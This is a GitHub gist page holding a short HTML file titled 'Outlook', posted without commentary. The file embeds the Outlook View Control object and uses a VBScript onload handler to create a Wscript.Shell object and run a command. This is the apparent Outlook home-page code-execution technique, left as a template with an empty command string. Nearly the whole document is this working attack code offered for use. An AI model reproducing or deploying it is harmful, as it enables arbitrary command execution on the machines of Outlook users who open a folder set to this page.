Skip to content

Instantly share code, notes, and snippets.

@S3cur3Th1sSh1t
Last active October 2, 2021 20:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save S3cur3Th1sSh1t/34ed28cfe7a8c53fd5ca8bbd36c8c3fe to your computer and use it in GitHub Desktop.
Save S3cur3Th1sSh1t/34ed28cfe7a8c53fd5ca8bbd36c8c3fe to your computer and use it in GitHub Desktop.
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
cmd.Run("")
End Sub
-->
</script>
</head>
<body>
<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment